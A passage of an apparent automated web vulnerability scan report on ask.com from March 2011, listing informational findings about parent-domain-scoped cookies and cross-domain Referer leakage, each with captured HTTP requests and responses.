qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response 2
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Thu, 24 Mar 2011 16:12:25 GMT Connection: close Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjEyOjI0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:24 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:12:24 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 118222 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]... text/javascript"> var st = new Image(); st.height = 1; st.width = 1; st.id = "SessionTracker"; st.src = "http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c407a&p=ja-question&ord=5096479&wz_cu=0"; </script> <noscript><img src="http://wzus1.ask.com/i/i.gif?t=v&d=us&s=a&c=qna&l=dir&o=0&ld=5489&sv=0a5c407a&p=ja-question&ord=5096479&wz_cu=0" height=1 width=1 id="SessionTracker" /></noscript> </span> <div id="ask_question_dialog"></div> <div id="ask_question_dialog_container" style="display:none"></div> <div id="asDlgWrap" style="overflow:hidden"></div> <div id="serp_ftr" class="ask-mrl15" style="margin-bottom:4px;margin-top:4px" > <a href="/about" onmousedown="return ct(this,30771)" class="txt2 info l_nu" target="_top"> About</a> <span class="txt2 info" style="padding:0 5px 0 5px;">-</span> <a href="/about/legal/privacy" onmousedown="return ct(this,30771)" class="txt2 info l_nu" target="_top"> Privacy</a> <span class="txt2 info" style="padding:0 5px 0 5px;">-</span> <a href="http://www.ask.com/settings#askeraser" class="txt2 info l_nu" onClick="">AskEraser</a> <span class="txt2 info" 
style="padding:0 5px 0 5px;">-<...[SNIP]...
6. Cookie scoped to parent domain
There are 5 instances of this issue:
6.1. http://www.ask.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ask.com
Path:
/
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
user=o=0&l=dir; Domain=.ask.com; Path=/
puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; puser=pt=VHVlLTIyLU1hci0yMDExLTE2OjAzOjU4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:28 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Set-Cookie: ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Content-Length: 94462 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]...
6.2. http://www.ask.com/answers/7153311/is-nail-polish-bad-for-your-nails
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ask.com
Path:
/answers/7153311/is-nail-polish-bad-for-your-nails
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /answers/7153311/is-nail-polish-bad-for-your-nails?qsrc=4034 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUxLVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:09:53 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA5OjUyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:09:52 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 118233 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]...
6.3. http://www.ask.com/ja-ask-dialog
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ask.com
Path:
/ja-ask-dialog
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ja-ask-dialog?type=signin HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: text/html, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: no-cache Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:29 GMT Connection: close Vary: Accept-Encoding Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:29 GMT; Path=/ Content-Length: 68842 ...[SNIP]...
6.4. http://www.ask.com/pictures
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ask.com
Path:
/pictures
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pictures?q=Star+Jones&o=0&l=dir&qsrc=3015 HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/pictureslanding?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA3LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.3.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:07:50 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjUwLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:50 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 106391 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> ...[SNIP]...
6.5. http://www.ask.com/pictureslanding
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ask.com
Path:
/pictureslanding
Issue detail
The following cookies were issued by the application and are scoped to a parent of the issuing domain:
puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pictureslanding?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Referer: http://www.ask.com/?o=0&l=dir User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAwLVVUQw%3D%3D&po=0&pp=dir
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: private Date: Thu, 24 Mar 2011 16:07:02 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:02 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 59137 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"> <html> <head> <tit...[SNIP]...
7. Cross-domain Referer leakage
There are 8 instances of this issue:
7.1. http://www.ask.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ask.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:
http://www.ask.com/?o=0&l=dir
The response contains the following links to other domains:
http://api.recaptcha.net/js/recaptcha_ajax.js
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=2adc1d6f3adc1d6f3;u4=;u3=;u2=0;ord=-424747543?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://twitter.com/askdotcom
http://www.facebook.com/AskDotCom
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; puser=pt=VHVlLTIyLU1hci0yMDExLTE2OjAzOjU4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0
Response
HTTP/1.1 200 OK Server: Apache Cache-Control: private Content-Type: text/html;charset=UTF-8 Date: Thu, 24 Mar 2011 16:05:28 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: user=o=0&l=dir; Domain=.ask.com; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjI4LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Set-Cookie: ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:05:28 GMT; Path=/ Content-Length: 94462 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]... </span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"> </a><a class="twitter sprite" href="http://twitter.com/askdotcom"> </a>...[SNIP]... </span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" > Careers</a>...[SNIP]... </span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank"> Help</a>...[SNIP]... </script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... <noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /> </noscript>...[SNIP]... 
<noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=2adc1d6f3adc1d6f3;u4=;u3=;u2=0;ord=-424747543?" width="1" height="1" frameborder="0"> </iframe>...[SNIP]...
7.2. http://www.ask.com/
Summary
Severity:
Information
Confidence:
Certain
Host:
http://www.ask.com
Path:
/
Issue detail
The page was loaded from a URL containing a query string:
http://www.ask.com/?o=0&l=dir
The response contains the following links to other domains:
http://api.recaptcha.net/js/recaptcha_ajax.js
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=;u3=;u2=0;ord=-1310065746?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://twitter.com/askdotcom
http://www.facebook.com/AskDotCom
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA1OjM4LVVUQw%3D%3D&po=0&pp=dir; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3; __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: private Date: Thu, 24 Mar 2011 16:06:59 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA2OjU5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:06:59 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:06:59 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 94492 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's Your Question?</title><meta name="description" content="Ask.com is the #1 question answering service that de...[SNIP]... </span><a class="facebook sprite" href="http://www.facebook.com/AskDotCom"> </a><a class="twitter sprite" href="http://twitter.com/askdotcom"> </a>...[SNIP]... </span><a id="ftCareers" href="http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh" class="txt3" > Careers</a>...[SNIP]... </span><a id="ftHelp" href="http://asksupport.custhelp.com/app/answers/list" class="txt3" target="_blank"> Help</a>...[SNIP]... </script><script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"> </script>...[SNIP]... <noscript><img src="http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1" /> </noscript>...[SNIP]... <noscript><iframe src="http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=;u3=;u2=0;ord=-1310065746?" width="1" height="1" frameborder="0"> </iframe>...[SNIP]...
7.3. http://www.ask.com/
Summary
Severity: Information
Confidence: Certain
Host: http://www.ask.com
Path: /
Issue detail
The page was loaded from a URL containing a query string: http://www.ask.com/?o=0&l=dir
The response contains the following links to other domains:
http://api.recaptcha.net/js/recaptcha_ajax.js
http://asksupport.custhelp.com/app/answers/list
http://b.scorecardresearch.com/p?c1=2&c2=6034776&c3=&c4=&c5=&c6=&c15=&cj=1
http://fls.doubleclick.net/activityi;src=2903398;type=homep773;cat=ask_e764;u1=0845DB8DB66BB2CFE0A8DECE14D761F3;u4=;u3=;u2=0;ord=-138491069?
http://hire.jobvite.com/CompanyJobs/Careers.aspx?c=qXY9VfwJ&su=fsY9Vfwe&cs=93q9Vfwh
http://twitter.com/askdotcom
http://www.facebook.com/AskDotCom
Request
GET /?o=0&l=dir HTTP/1.1 Host: www.ask.com Proxy-Connection: keep-alive Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: cu.wz=0; wz_cu=0; tbe=1; accepting=1; user=o=0&l=dir; ldpt=porg=5829|0~5830|0~5832|0~5833|0~5834|0~5488|0~5489|1; wz_uid=0845DB8DB66BB2CFE0A8DECE14D761F3; wz_scnt=1; __utmz=252994457.1300982764.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=252994457.137424121.1300982764.1300982764.1300982764.1; __utmc=252994457; __utmb=252994457.2.10.1300982764; puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjAyLVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; wz_sid=0144DB8DB86BB2CFE0A8DECE14D761F3
Response
HTTP/1.1 200 OK Server: Apache Content-Type: text/html;charset=UTF-8 Cache-Control: private Date: Thu, 24 Mar 2011 16:07:09 GMT Connection: close Vary: Accept-Encoding Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: puser=pt=VGh1LTI0LU1hci0yMDExLTE2OjA3OjA5LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:09 GMT; Path=/ Set-Cookie: skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; Domain=.ask.com; Expires=Fri, 23-Mar-2012 16:07:09 GMT; Path=/ Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: qc=0; Domain=.ask.com; Path=/ Content-Length: 94491 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN"><html><head><title>Ask.com - What's 